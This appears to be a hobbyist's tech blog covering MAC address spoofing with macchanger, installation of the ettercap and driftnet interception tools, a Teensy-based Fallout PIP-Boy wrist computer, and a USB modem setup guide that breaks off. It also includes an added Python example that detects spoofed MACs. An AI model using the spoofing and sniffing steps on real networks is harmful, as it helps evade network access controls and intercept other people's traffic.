| in the Netherlands.\x0D
| (c) The Foundation for Internet Domain Registration in the Netherlands\x0D
| (SIDN) Dutch Copyright Act, protection of authors' rights (Section 10,\x0D
|_subsection 1, clause 1).\x0D
 
Nmap done: 1 IP address (1 host up) scanned in 8.13 seconds

  • Shit about how iptables work
  • Shit about configuring iptables
  • Shit about restoring config at reboot

Installing MAC CHANGER on Debian Jessie

ztik@unknownhost:~$ apt-get install macchanger
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following NEW packages will be installed:
  macchanger
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 192 kB of archives.
After this operation, 622 kB of additional disk space will be used.
Get:1 http://ftp.nl.debian.org/debian/ jessie/main macchanger amd64 1.7.0-5.3 [192 kB]
Fetched 192 kB in 0s (1,257 kB/s)
Preconfiguring packages ...
Selecting previously unselected package macchanger.
(Reading database ... 155263 files and directories currently installed.)
Preparing to unpack .../macchanger_1.7.0-5.3_amd64.deb ...
Unpacking macchanger (1.7.0-5.3) ...
Processing triggers for man-db (2.7.0.2-5) ...
Processing triggers for install-info (5.2.0.dfsg.1-6) ...
Setting up macchanger (1.7.0-5.3) ...
ztik@unknownhost:~$ 

Set randomized MAC address

ztik@unknownhost:~$ ifconfig eth0 | grep HWaddr
eth0      Link encap:Ethernet  HWaddr 08:00:27:b8:9b:bf  
ztik@unknownhost:~$ macchanger -r eth0
Current MAC:   08:00:27:b8:9b:bf (CADMUS COMPUTER SYSTEMS)
Permanent MAC: 08:00:27:b8:9b:bf (CADMUS COMPUTER SYSTEMS)
New MAC:       42:18:a8:ca:e4:b5 (unknown)
ztik@unknownhost:~$ ifconfig eth0 | grep HWaddr
eth0      Link encap:Ethernet  HWaddr 42:18:a8:ca:e4:b5 
ztik@unknownhost:~$ 

Set fixed MAC address

ztik@unknownhost:~$ ifconfig eth0 | grep HWaddr
eth0      Link encap:Ethernet  HWaddr 42:18:a8:ca:e4:b5  
ztik@unknownhost:~$ macchanger -m 00:11:22:22:11:00 eth0
Current MAC:   42:18:a8:ca:e4:b5 (unknown)
Permanent MAC: 08:00:27:b8:9b:bf (CADMUS COMPUTER SYSTEMS)
New MAC:       00:11:22:22:11:00 (CIMSYS Inc)
ztik@unknownhost:~$ ifconfig eth0 | grep HWaddr
eth0      Link encap:Ethernet  HWaddr 00:11:22:22:11:00  
ztik@unknownhost:~$ 

Restore original MAC address

ztik@unknownhost:~$ ifconfig eth0 | grep HWaddr
eth0      Link encap:Ethernet  HWaddr 00:11:22:22:11:00  
ztik@unknownhost:~$ macchanger -p eth0
Current MAC:   00:11:22:22:11:00 (CIMSYS Inc)
Permanent MAC: 08:00:27:b8:9b:bf (CADMUS COMPUTER SYSTEMS)
New MAC:       08:00:27:b8:9b:bf (CADMUS COMPUTER SYSTEMS)
ztik@unknownhost:~$ ifconfig eth0 | grep HWaddr
eth0      Link encap:Ethernet  HWaddr 08:00:27:b8:9b:bf  
ztik@unknownhost:~$ 
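From the defender's side the interesting detail in the session above is that the address produced by `macchanger -r` (42:18:a8:ca:e4:b5) has the locally-administered bit (bit 1 of the first octet) set, whereas the fixed one chosen with `-m` borrows a real vendor OUI and does not. The Python below is an added example, not part of this blog or of macchanger: it decodes a MAC address into its OUI and its I/G and U/L flag bits and compares the live address against a known permanent one, which is what a NAC or DHCP-log check would do. The permanent and assigned addresses are taken from the session above; the inventory dictionary is constructed.

```python
import re

# Six hex pairs separated consistently by ':' or '-'.
MAC_RE = re.compile(r"^([0-9A-Fa-f]{2})([:-])(?:[0-9A-Fa-f]{2}\2){4}[0-9A-Fa-f]{2}$")


def normalize_mac(mac):
    """Validate and return the address as lowercase, colon separated."""
    if not MAC_RE.match(mac):
        raise ValueError(f"not a MAC address: {mac!r}")
    return mac.replace("-", ":").lower()


def describe_mac(mac):
    """Decode the IEEE 802 flag bits of the first octet and the OUI (first three octets)."""
    mac = normalize_mac(mac)
    first = int(mac[:2], 16)
    return {
        "mac": mac,
        "oui": mac[:8],
        "multicast": bool(first & 0x01),             # I/G bit: 1 = group address
        "locally_administered": bool(first & 0x02),  # U/L bit: 1 = not vendor-assigned
    }


# Constructed inventory: interface -> permanent (burned-in) address, as an
# asset database or switch port-security table would hold it. The value is
# the Permanent MAC macchanger printed above.
INVENTORY = {"eth0": "08:00:27:b8:9b:bf"}


def check_interface(name, current, inventory=INVENTORY):
    """Return reasons to look at this interface; an empty list means it matches inventory."""
    info = describe_mac(current)
    reasons = []
    permanent = inventory.get(name)
    if permanent is None:
        reasons.append(f"{name}: no inventory record")
    elif normalize_mac(permanent) != info["mac"]:
        reasons.append(f"{name}: {info['mac']} differs from permanent {normalize_mac(permanent)}")
    if info["locally_administered"]:
        reasons.append(f"{name}: {info['mac']} has the locally-administered bit set (not a burned-in address)")
    return reasons


if __name__ == "__main__":
    for seen in ("08:00:27:b8:9b:bf", "42:18:a8:ca:e4:b5", "00:11:22:22:11:00"):
        print(seen, check_interface("eth0", seen) or ["matches inventory"])
```

The U/L bit catches the random address, but the `-m` address looks exactly like a real CIMSYS NIC; only the comparison against a recorded permanent address or an 802.1X identity catches that one.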

Installing Ettercap on Debian Jessie

ztik@unknownhost:~$ apt-get install ettercap-graphical
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following extra packages will be installed:
  ethtool ettercap-common libluajit-5.1-2 libluajit-5.1-common libnet1
The following NEW packages will be installed:
  ethtool ettercap-common ettercap-graphical libluajit-5.1-2 libluajit-5.1-common libnet1
0 upgraded, 6 newly installed, 0 to remove and 0 not upgraded.
Need to get 1,139 kB of archives.
After this operation, 3,419 kB of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 http://ftp.nl.debian.org/debian/ jessie/main libluajit-5.1-common all 2.0.3+dfsg-3 [36.6 kB]
Get:2 http://ftp.nl.debian.org/debian/ jessie/main libluajit-5.1-2 amd64 2.0.3+dfsg-3 [204 kB]
Get:3 http://ftp.nl.debian.org/debian/ jessie/main libnet1 amd64 1.1.6+dfsg-3 [60.4 kB]
Get:4 http://ftp.nl.debian.org/debian/ jessie/main ethtool amd64 1:3.16-1 [94.9 kB]
Get:5 http://ftp.nl.debian.org/debian/ jessie/main ettercap-common amd64 1:0.8.1-3 [567 kB]
Get:6 http://ftp.nl.debian.org/debian/ jessie/main ettercap-graphical amd64 1:0.8.1-3 [176 kB]
Fetched 1,139 kB in 0s (2,774 kB/s)         
Selecting previously unselected package libluajit-5.1-common.
(Reading database ... 155063 files and directories currently installed.)
Preparing to unpack .../libluajit-5.1-common_2.0.3+dfsg-3_all.deb ...
Unpacking libluajit-5.1-common (2.0.3+dfsg-3) ...
Selecting previously unselected package libluajit-5.1-2:amd64.
Preparing to unpack .../libluajit-5.1-2_2.0.3+dfsg-3_amd64.deb ...
Unpacking libluajit-5.1-2:amd64 (2.0.3+dfsg-3) ...
Selecting previously unselected package libnet1:amd64.
Preparing to unpack .../libnet1_1.1.6+dfsg-3_amd64.deb ...
Unpacking libnet1:amd64 (1.1.6+dfsg-3) ...
Selecting previously unselected package ethtool.
Preparing to unpack .../ethtool_1%3a3.16-1_amd64.deb ...
Unpacking ethtool (1:3.16-1) ...
Selecting previously unselected package ettercap-common.
Preparing to unpack .../ettercap-common_1%3a0.8.1-3_amd64.deb ...
Unpacking ettercap-common (1:0.8.1-3) ...
Selecting previously unselected package ettercap-graphical.
Preparing to unpack .../ettercap-graphical_1%3a0.8.1-3_amd64.deb ...
Unpacking ettercap-graphical (1:0.8.1-3) ...
Processing triggers for man-db (2.7.0.2-5) ...
Processing triggers for desktop-file-utils (0.22-1) ...
Processing triggers for gnome-menus (3.13.3-6) ...
Processing triggers for mime-support (3.58) ...
Setting up libluajit-5.1-common (2.0.3+dfsg-3) ...
Setting up libluajit-5.1-2:amd64 (2.0.3+dfsg-3) ...
Setting up libnet1:amd64 (1.1.6+dfsg-3) ...
Setting up ethtool (1:3.16-1) ...
Setting up ettercap-common (1:0.8.1-3) ...
Setting up ettercap-graphical (1:0.8.1-3) ...
Processing triggers for libc-bin (2.19-18+deb8u7) ...
ztik@unknownhost:~$

Installing Driftnet on Debian Jessie

ztik@unknownhost:~$ apt-get install driftnet
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following NEW packages will be installed:
  driftnet
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 31.7 kB of archives.
After this operation, 113 kB of additional disk space will be used.
Get:1 http://ftp.nl.debian.org/debian/ jessie/main driftnet amd64 1.1.5-1+b2 [31.7 kB]
Fetched 31.7 kB in 0s (419 kB/s)
Selecting previously unselected package driftnet.
(Reading database ... 155252 files and directories currently installed.)
Preparing to unpack .../driftnet_1.1.5-1+b2_amd64.deb ...
Unpacking driftnet (1.1.5-1+b2) ...
Processing triggers for man-db (2.7.0.2-5) ...
Processing triggers for desktop-file-utils (0.22-1) ...
Processing triggers for gnome-menus (3.13.3-6) ...
Processing triggers for mime-support (3.58) ...
Setting up driftnet (1.1.5-1+b2) ...
ztik@unknownhost:~$ 

  • Shit about running a TOR relay node
  • Shit about running a TOR exit node
  • Shit about how to run a server behind the TOR network
  • Shit about keeping your TOR connection secure

more shit I still need to finish :(


  • Shit about setting up SSH server and client
  • Shit about securing SSH connections
  • Shit about Key Based Authentication

For some time I have been working on a new project, something completely new to me.
I bought myself a Teensy 3.0, which is an extremely tiny microcontroller, with a lot of bang :)

This microcontroller has some amazing abilities, like being detected as an HID (keyboard/mouse/joystick), which means it can type, move the mouse cursor or joystick axes (and press mouse/joystick buttons, of course).
Since every operating system contains default drivers for HID interfaces, there is no need to install any extra software to make it work.
Just connect it to the computer's USB port, and the operating system will load its default drivers.
This is amazing and loads of fun, but within a matter of weeks I wanted to take the next step: actually using the Teensy as a microcontroller and connecting some stuff to it.

I turned on the A-Team theme song and started to connect an RGB LED.
When the song was finished I wasn't done yet, so I followed up with the MacGyver theme song.

I wasn't really expecting success, I was expecting smoke, but by the time this second song was done I ended up with a blinking RGB LED, each blink displaying a new colour!
The same can be said about the temperature sensor I connected afterwards; it worked on the first try :)
At the time I was playing the computer game 'Fallout', in which the main character wears a wrist computer called a 'PIP Boy 3000'.

This device can perform all kinds of cool stuff:

  • It displays all the items the character in the game is carrying with him/her.
  • It displays all sorts of information, from a local map and world map to a Geiger counter.
  • It enables the wearer to use modules like an FM radio and to measure physical statistics such as vital signs, the amount of radiation absorbed and other afflictions one might have, like addictions.

How cool would that be? My own PIP Boy 3000 :)

Since this would not just be a cool gadget, but also a way to learn more about how to work with electronics, I decided to throw some money at it and buy a 2.8" TFT touchscreen along with every kind of module & sensor that can mimic the functions of the in-game device (at the bottom of this post is a link to all the parts).

Although it took me a little over 3 weeks to get the screen to work, once it actually worked my project picked up a lot of momentum :)
Since then I have been able to connect a lot of add-ons such as the MicroSD adapter, a GPS module, pulse sensor, compass, altimeter, speaker, microphone, FM radio module, buttons, lights and even an I/O expander.
Since I do not have a lot of knowledge of basic electronics, somewhere along the way I became a member of hackerspace 'Technologia Incognita', located in Amsterdam.

As time passes, more functions will be added, and more information will be released.
Updates will follow on this website :)


What is it?

A wristcomputer similar to the PIP Boy 3000 from the game series Fallout.

The device is made up of several modules and sensors such as:

  • 2.8" TFT touchscreen
  • MicroSD card (contains images and logfiles)
  • GPS
  • Compass
  • FM Radio
  • 6 Degrees Of Freedom motionsensor
  • Altitude/pressure sensor
  • Light sensors
  • Audio sensors
  • 3x ultrabright white LEDs
  • 1x non-diffused RGB LED
  • Laserpointer

The PIP Boy 3000 from the game series Fallout also contains a Geiger counter, <s>but I do not think this is a realistic addition :(</s> and it turns out this is actually doable :)
More updates on this will follow soon.

The 'PIP' in the name 'PIP Boy 3000' is an acronym for 'Personal Information Processor'.
I am not sure yet what 'PIP GRL 31415' will stand for, probably something like:

  • 'Personal Information Processor - Graphical Readouts/Locator'

Things to know

  • To use the touch sensitive screen a stylus is… useful unless you have small fingers.
  • The option pages (Page_100-103) can be opened by touching/pressing the top-right corner of the screen; there is an invisible 5×5 px square that activates it.
  • Before power up, check if the laserpointer is still properly connected. Its wires unplug rather easily.
  • To power it up, you do NOT need to plug in a USB cable into the Teensy 3.0 microcontroller.
  • I have cut the VIN trace, which means the Teensy is not drawing power from its USB cable, but from an external source.
  • The external source is the Breadboard USB powersupply, which delivers 5v to the Teensy's 'Vin (3.7 to 5.5 volts)' pin.
  • There is also a switch on the Breadboard USB powersupply which has to be flipped to turn on/off :)
  • To modify code on the microcontroller, you only need to connect the Teensy Micro-USB connection to a computer.
  • To use the PIP GRL 31415, you only need to connect the Breadboard USB powersupply, and flip the switch.

What happens when you turn it on

When the device is powered up, the first thing it will ask is to select the proper password (Page_0).
You have 4 tries, after which the device will enter 'bricked mode'.
At the moment of writing this is bypassable by restarting the device (i.e. bricked mode is NOT permanent during the prototype phase).

Once logged in, the user has a choice of several 'pages':

  • Page_1, Page_2 & Page_3 are 'normal' pages which contain functions the end user is able to use.
  • Page_100, Page_101, Page_102 & Page_103 are 'option' pages, much like the settings screen of any computer game.
  • Page_99 is the 'bricked' page.

Overview of page functionality

Page_0 a.k.a. LOGIN

The LOGIN page displays a list of characters and words; the password needs to be selected to continue.
This page is a direct copy of the RobCo computer terminals present throughout the game series Fallout.
One small change has been made: this device will not display the number of correct characters in the chosen password, as the game does.

After 4 consecutive incorrect attempts, Page_99 is displayed (bricked mode).


Page_1 a.k.a. STATS

The STATS page is divided into 5 menus; each menu can have several submenus.

Status menu

The Status menu has 3 submenus:

CND:
Displays the end user's health.

RAD:
Displays the amount of radiation absorbed; at the moment this is actually the average of 3 random numbers.
The random numbers are readings from an analog pin without anything connected to it (noise).

EFF:
Displays the armor the end user is wearing; also not functioning… (RFID tags in clothes?)

S.P.E.C.I.A.L. menu

The S.P.E.C.I.A.L. menu has 7 submenus:

Strength:
Displays description with value 5

Perception:
Displays description with value 9

Endurance:
Displays description with value 9

Charisma:
Displays description with value 7

Intelligence:
Displays description with value 9

Agility:
Displays description with value 8

Luck:
Displays description with value 9

Skills menu

Doesn't display anything yet; currently working on this section.
Will soon display 3 submenus: keyboard/mouse/joystick/gamepad (keyboard and mouse are working now).
From these you will have the option to control ANY computer just by connecting a USB cable between the computer itself and the Teensy microcontroller.

Thought for later: add a wireless connection, although this will probably require drivers to be installed (which destroys the plug&play functionality) and will probably consume much more power.1)

The mouse functions are implemented (with the exception of mouse-scroll up/down), and they work like a charm.

Keyboard submenu:
Well… I could explain every key here, but that would be a waste of space.
I have been working on a US International keyboard layout without numpad (not enough space on screen), so it will probably end up working more like a laptop keyboard.

Some things to take into consideration:

  • Press CAPS or SHIFT for uppercase and/or other characters.
  • CTRL, ALT, SHIFT and the right WIN button are modifier keys, meaning when you press one it stays highlighted until you press another (non-modifier) key.
  • The left WIN button is a non-modifier key and functions as a normal single-press Super/Win key.
  • It is not possible to use multiple modifier keys at the same time.

I still need to update the code to allow such outlandish behaviour.
Having CTRL and SHIFT selected and then pressing the letter S will result in the key combination SHIFT-S being sent first, followed by CTRL-S.

More information can be found here.

Mouse submenu:
Control mouse with directional keypad (8 directions)
Buttons to simulate LMB, MMB, RMB press.
Buttons to simulate holding down LMB, MMB, RMB to support Drag&Drop functions (press once to hold down, press another time to release).
Buttons to simulate Scroll Up and Scroll Down.

More information can be found at http://pjrc.com/teensy/td_mouse.html.

Joystick submenu:
A bit of a weird one: joysticks work on 6 axes, 32(!) buttons and 1 hat switch, and all of these will be implemented.
I never worked with joystick controls before, but I suspect I'll get it right on the first try (how hard can it be, right?).

Working so far:

  • X, Y & Z axis
  • Left & right sliders

Still need to figure out the difference between the Z axis and Z-rotate (a different axis?)…

More information can be found at http://pjrc.com/teensy/td_joystick.html.

Gamepad submenu:
Very similar to the Joystick submenu, only with a different button layout.

More information can be found at http://pjrc.com/teensy/td_joystick.html.

Perks menu

Doesn't display anything yet.

Also, not really sure what to put here, will most likely become computer control scripts such as:

  • Windows Powershell & Linux shell scripts
  • wget wallpaper and set to screen script
  • anything else?

General menu

Doesn't display anything yet.

Will possibly contain statistics such as time used, SD space used/available, distance traveled (will be inaccurate, as the GPS doesn't always have a fix) and other fun statistics.


Page_2 a.k.a. ITEMS

The ITEMS page still needs to be filled; the layout exists but nothing has been added (yet).


Page_3 a.k.a. DATA

The DATA page is where most of the magic happens; it has 5 menus:

Local Map

The Local Map displays a map of the Netherlands, and once the GPS has a fix a rectangle will appear as a 'You are here' indicator.
The plan is to divide this into 3 submenus, each showing a different zoom level of the map (1=country, 2=province, 3=city).

World Map

Same as the Local Map, except this displays a map of the world.
The plan is to divide this into 3 submenus, each showing a different zoom level of the map (1=world, 2=continent, 3=country).

Quests

The Quest menu should display your active/finished quests, but because I do not know how to implement this yet, I decided to put the audio sensors' output here.
The code written for reading the microphone's peak-to-peak value is horrible and doesn't function properly yet (it should make use of interrupts, not a timed interval).

Misc

The Misc menu displays the values from the light dependent resistor.
The goal is to use this value to automatically decrease the TFT backlight using a digital potentiometer.

Radio

The Radio menu contains all controls for the FM radio:
turn on/off, mute on/off, seek up/down, tune up/down, volume up/down.
It also displays the frequency you are listening to, and whether this is a mono or stereo signal.

At the moment RDS is not being processed, but will be in the near future.


Page_99 a.k.a. BRICKED

This page will be displayed if you choose the wrong password 4 consecutive times.
Turn the device off and on to retry; bricked mode is not permanent while prototyping :)


Page_100 a.k.a. DISPLAY

The DISPLAY options contain:

  • Backlight brightness level (not functioning until I have the digital potentiometer).
  • Image quality low/medium/high (this defines the prefix folder where images are stored).
  • HUD color (to change foreground colors)
  • Background color (to change… you guessed it…)
  • Return button to return to last used page/menu/submenu

Page_101 a.k.a. AUDIO

The AUDIO options are:

  • Mute on/off (to mute the speaker, NOT the radio!)
  • Return button to return to last used page/menu/submenu

Page_102 a.k.a. CONTROL

The CONTROL options contain:

  • LED1 on/off (turns on/off ultrabright LED1)
  • LED2 on/off (turns on/off ultrabright LED2)
  • LED3 on/off (turns on/off ultrabright LED3)
  • LED4 on/off (turns on/off RGB LED4 RED)
  • LED5 on/off (turns on/off RGB LED4 BLUE)
  • LED6 on/off (turns on/off RGB LED4 GREEN)
  • LASER on/off (turns on/off LASER pointer)
  • ALL on/off (turns on/off everything)
  • Return button to return to last used page/menu/submenu

Page_103 a.k.a. GAMEPLAY

The GAMEPLAY options contain:

  • PAGE1 (shortcut to goto page1)
  • PAGE2 (shortcut to goto page2)
  • PAGE3 (shortcut to goto page3)
  • Return button to return to last used page/menu/submenu

Videos

Some YouTube videos I made (poor quality due to a bad webcam; I'll shoot a proper new video soon):

First project video

PIP-GRL 31415

This is the start of my project, something that has already been done, but I want it myself :)

A few attempts have been made at recreating a PIP-BOY from the game Fallout, and as far as I know there has only been 1 that actually worked, but it went up in flames :(
(http://www.raspberrypi.org/archives/tag/pipboy)

At the moment I have:
-Teensy 3.0 microcontroller
Similar to an Arduino, but faster and smaller, with more memory and a 32-bit ARM processor.
http://www.pjrc.com/store/teensy3.html

-MicroSD adapter with an 8GB SDHC Kingston card
http://www.pjrc.com/store/sd_adaptor.html

-2.8" touch-sensitive TFT screen with 18-bit colour (262,000 different shades), 240x320 pixel resolution and a 4 white-LED backlight.
http://www.adafruit.com/products/335

-An old PC speaker I salvaged out of ancient hardware, which plays the Tetris theme song quite well and is now responsible for simple beeps and bips.

-MiPow 2600 Powertube, basically a 2600mA battery with USB connections.
Currently I am still working off my computer's power supply though.
http://www.conrad.nl/ce/nl/product/200240/Mipow-Powertube-2600-zwart-SP2600M-BK-Mipow-2600M-Mobiele-stroomvoorziening-reserve-batterij

I am planning on getting some more sensors now, thinking of:
-Compass/GPS for my waypoint system (TomTom)
-Pulse sensor, to detect 'health'
-FM module; it's not a PIP-BOY until you can listen to Three Dog barkin' on the radio waves.
-Some way to get better audio (.wav files or alike)
 
Maybe I'll get a gyroscope as well, although I'm not sure yet how to incorporate it into the PIP-BOY.

The code currently contains 4 pages; only page 1 (terminal login) and page 2 (stats) are displayed in the video, because page 3 (items) and page 4 (data) are still empty.
Page 2 is also not completed yet; it displays everything up to the Skills menu, which hasn't been written yet.

I have added the Vault Boy images to the SD card, but I am currently rewriting the graphics library to support faster loading from SD.
Also, I still have to make all the functions actually work...
For instance: the RAD meter is static and always reads 12.

A lot of work to do, but I'm not in a hurry ;)

Click on the link below to follow the forum thread with much, much more detail:
http://forum.pjrc.com/threads/17717-PIP-GRL-31415-(not-spam!)

Update #1

PIP-GRL 31415 update #1

Some interface updates:

A lockscreen if the wrong password is entered 4x.

The radmeter now displays a random value (actually the average of 3 random values)

Replaced LVL/HP/AP/XP with battery, time/date and GPS lat&long indicators (only the batt. indicator isn't a true value)


GPS is working :P !!!!

I replaced my old pc-speaker with a new smaller one (one of those used in greeting cards)

Also, I managed to get the bmp display code working with the new SdFat library, so the final image you see of Vaultboy is loaded from MicroSD and displayed within 0.119 sec :P

List of items used:
http://pastebin.com/raw.php?i=eZutwJnw
Prices are in euros, and the only thing not included in this list is the Teensy 3.0 itself...
Find the Teensy at http://www.pjrc.com/store/teensy3.html

Update #2

PIP-GRL 31415 update #2

A few more updates on the PIP-GRL software

-I made a quick settings menu.
Options are Mute on/off, goto Page 1, goto Page 2, goto Page 3, change hud_color and change background_color
(I still need to rename the bottom row of colors to background instead of hud).
I open the settings menu by touching/pressing the top right corner, where there is an invisible 10px by 10px square ;)

-Since the GPS now works and shows my position accurate to the meter (even indoors), I have taken a map of the Netherlands and placed a 'you-are-here' square on top of my coordinates.
Once I have connected my compass I will replace the square with an arrow pointing in the direction I am facing.

-Page 2 and Page 3 are just copies of Page 1, and don't really function yet.
Page 1 = STATS
Page 2 = ITEMS
Page 3 = DATA
These pages will be opened by pressing a button, but since I don't want to mess with buttons while testing the interface, I created a quicklink in the settings window.

Sorry about the quality of the videos, I need a better cam

Update #3

PIP-GRL 31415 update #3

A few more (small) updates:

-I got the microphone working, and made a simple volume meter.
-I have connected a laser pointer, which is controlled by a 16-bit I/O expander on the I2C bus.
-I have a compass connected and working, but I have not made a visual interface for it yet; it's purely code at the moment.
-The same goes for my pulse sensor: it works in code, but I have not created a visual interface for it.
-I also connected 2 ultra-bright LEDs to the I/O expander, so I can illuminate any room at will.

For both the compass and the pulse sensor I still need to do some calibrating, so they work within a fair degree of accuracy.


Oh yeah, you can see the TFT backlight dim at the start of the video; I still want to use a digital switch for this.
For this I need a 60 cent item, which will have at least 5 euro delivery costs, so I'll wait until I need more :)


P.S. I really need to make the invisible menu button larger :x

Update #4

PIP-GRL 31415 update #4

Some more updates

I have changed the Settings menu to have 4 tabs: Display, Audio, Controls, Gameplay
-In the Display section you can change the background and text color.
-In the Audio section you can mute the speaker and turn LED1-LED7 and the laser pointer on/off (still need to move these to Controls).
The Audio section also contains the quicklinks to Page 1, 2 & 3, because I have not connected the buttons for them yet.

On Page 3 at the Misc menu I have added a Light Level Meter which I (badly) demonstrated by moving a flame closer to and away from the sensor.

Then on the Radio menu you can choose to turn on the radio itself.
If you do, a lot of options very similar to a stereo will appear:
Volume up and down, Seek up and down, Tune up and down and the option to mute the radio but keep it turned on.


P.S. The sound of the radio might sound terrible but that is because I have no speakers and I'm using my headphones at 10cm away from my mic...
It is actually quite good !

P.P.S. I do not own any of the songs that were broadcast on the radio while recording this video; all copyrights go to those who deserve them etc. etc.

P.P.P.S. On the following page you can find my project wiki, which is the most comprehensive writeup on my project so far.
http://wiki.techinc.nl/index.php/PIP-GRL_31415

All components have been ordered from 7 different webshops: PJRC, EZtronics, Conrad, Floris.cc, Sparkfun Electronics, iPrototype.nl and AlphaCrucis.

On a sidenote:

I would rate all these webshops with 5/5 stars, with the exception of AlphaCrucis.
It took them 5 weeks to respond to my mail asking why my order wasn't sent (one of the items was not in stock), and another 3 weeks to realize that this particular item would not be resupplied.
That was when I finally received an email with the message 'your order has been shipped' and a second email saying that a refund of somewhere around 3 euro had been initiated.
When I finally received my package and checked the invoice, it turned out I had waited 8 weeks for F/M jumper cables…

Tools

Sensors & modules

Product name & link | In use | Additional information
Triple Axis Accelerometer & Gyro | yes | in need of calibration
Line Tracking sensor | no | need to free pins and use 5v-3.3v logic level converter
Color Light Sensor | no | need to free PWM pins to connect RGB LED
Breakout voor Audio Plug | no | still needs to be soldered
Audio Plug female 3.5mm | no | still needs to be soldered
Adafruit Ultimate GPS Breakout - 66 channel w/10 Hz updates - V3 | yes | works quite well without external antenna
LSM303 Breakout Board - Tilt Compensated Compass | yes | needs calibrating
Humidity and Temperature Sensor - RHT03 | no | tested and works, but now unplugged to free pins for other uses
Logic Level Converter | no | not being used (yet)
8-channel Bi-directional Logic Level Converter - TXB0108 | no | not being used (yet)
MPL3115A2 Altitude/Pressure Sensor Breakout | yes | in need of calibration
SpeakJet | no | not connected, probably never will be
Pulse Sensor | no | connected and worked, needs calibration, has been disconnected to free pins
Evaluation Board for Si4703 FM Tuner | yes | connected and works
Laser Card Module - Red | yes | connected through MCP23016 and works
Max Power IR LED Kit | no | still needs to be soldered

Simple parts

Product name & link | In use | Additional information
Steekprintplaat EIC-102 (l x b x h) 165 x 55 x 8.5 mm Aantal poolklemmen 830 | yes | currently houses the project
Bedradingsset EIC-J-XL Set steekbruggen (l x b x h) 205 x 145 x 40 mm | yes | what's left is in the space
Mipow Powertube 2600, zwart SP2600M-BK Mipow 2600M mobiele oplader | no | works perfectly, but not useful while prototyping
Breadboard met Jumpwires | yes | holds whatever didn't fit on the main breadboard anymore (mainly I2C devices)
Premium Jumpwires M/F | yes | bag of 10, 2 are in use for the A10 & A11 pins on the Teensy
Digitale Sensor kabel | no | not being used
Analoge Sensor kabel | no | not being used
Mini Speaker | no | was connected, but had to unplug to free a pin for other uses
3x LED Wit (Extra bright) | yes | connected through the MCP23016 expander
20 in 1! Basic components mixed pack | no | unopened in my box in the space, still need to sort and put in proper storage boxes
6x Solderless Headers - 10-pin Straight | yes | a lot of these have been used, very useful buggers
2x Breadboard wire bundle | yes | same as above, 1 pack has been used, the other is in the jumperwire storage box
Black Metal Knob - 14x24mm | no | not being used, doesn't fit on my potentiometer
Key Switch - Small | no | not being used yet, one of the final things to be added
Coin Cell Battery - 20mm | no | tested and works, currently searching for a nice holder
10K Breadboard Potentiometer | yes | is being used to dim the TFT backlight
Surface Transducer - Small | no | not in use yet, needs soldering of two tiny pads
Electret Microphone Amplifier - MAX4466 with Adjustable Gain | yes | in use for the audio volume meter
LED Light Pipe 0.6" Round | no | not being used, not sure if it will be either
3x LED Tactile Button - Red | no | haven't got a clue how to connect these at the moment
Resistor Kit - 1/4W (500 total) | yes | very useful, although I'm not sure why 0 Ohm resistors (only 20, see http://en.wikipedia.org/wiki/Zero-ohm_link) are included…

Advanced parts

Product name & link | In use | Additional information
Teensy USB Board, Version 3.0, with Header Pins | yes | the beating heart of this project.. connected and works :)
Micro SD Card Adaptor | yes | works very well, using the SdFat beta (SdFatBeta20130207.zip from http://code.google.com/p/beta-lib/downloads/list) for optimized speed
Pin Expander (MCP23016) | yes | connected and works for output, need to use a scope to test input
I2C Bus Expander (PCF8574AN) | no | not being used yet
Light Dependent Resistor | yes | in use, works very well
Breadboard Power Supply USB - 5V/3.3V | yes | one of the best purchases I made, powers the breadboard with 5v on the top rail and 3.3v on the bottom rail
MCP23017 - i2c 16 input/output port expander | no | not being used, had some issues connecting this, although it's said to be faster/better
MOSFET Power Control Kit | no | still needs soldering
10x Resettable Fuse PTC | yes | a few of these have been connected (TFT screen & compass module)
Crystal 32kHz | no | needs to be soldered to the Teensy
2.8" 18-bit color TFT LCD with touchscreen breakout board - ILI9325 | yes | works excellently, bought from EZtronics (http://www.eztronics.nl/) but no longer available on their site

Coming soon, to a theatre near you, in 3D with Dolby Surround.


Coming soon part 2: Coming sooner!


Coming Soon part 3: Revenge of those left behind!


Coming Soon part 0.5: When ignorance was bliss!


For some time now I've been blessed with a new internet connection from an Internet Service Provider called UPC.
Along with this static/permanent connection at home I also applied for mobile internet, using a USB dongle made by NuCom HK.
According to the ladies and gentlemen at UPC, this device can only be used in Windows because there are no drivers available for *nix…

Well, I'm here to tell you otherwise!

First off, some info on the device itself:

Name: NU-WU200 WCDMA/HSPA+ USB Modem
Manufacturer: NuCom HK
Chipset: Qualcomm 8200A
NAND+SDRAM: 512MB+256MB
Antenna: built-in monopole antenna
Frequency range: 824-960MHz & 1710-2170 MHz
SIM/USIM card: standard SIM card interface, in line with 3GPP 31.101 and 31.102
Size: 80mm * 25mm * 10.5mm
Weight: 22g

Supports HSPA / UMTS (2100/900MHz) and GSM / GPRS / EDGE (850/900/1800/1900MHz).
Supports HSDPA+ (21 Mbps), HSUPA (5.76 Mbps), UMTS (384 Kbps), EDGE (237 Kbps), GPRS (85.6 Kbps).
Supports data service, SMS, PIN management, phone book, volume statistics, PC voice (optional).

All very interesting, but not why you're reading this blog entry I guess, so let's move on to the installation :)

  1. Boot up your Debian machine, start a terminal and connect your USB dongle.
  2. Wait until the light on the USB dongle is flashing green.
  3. Run 'lsusb' and verify your device has been recognized (it is the device without a description):
    lsusb
    Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
    Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
    Bus 003 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
    Bus 004 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
    Bus 005 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
    Bus 001 Device 013: ID 2077:9000 <------------------
    Bus 001 Device 004: ID 13d3:5119 IMC Networks 
    Bus 003 Device 002: ID 046d:c01e Logitech, Inc. MX518 Optical Mouse

    Notice that the USB dongle has no device information listed.

  4. Run 'dmesg' to find out where the device is located in your /dev list:
    dmesg
    [81619.836116] usb 1-1: new high-speed USB device number 14 using ehci_hcd
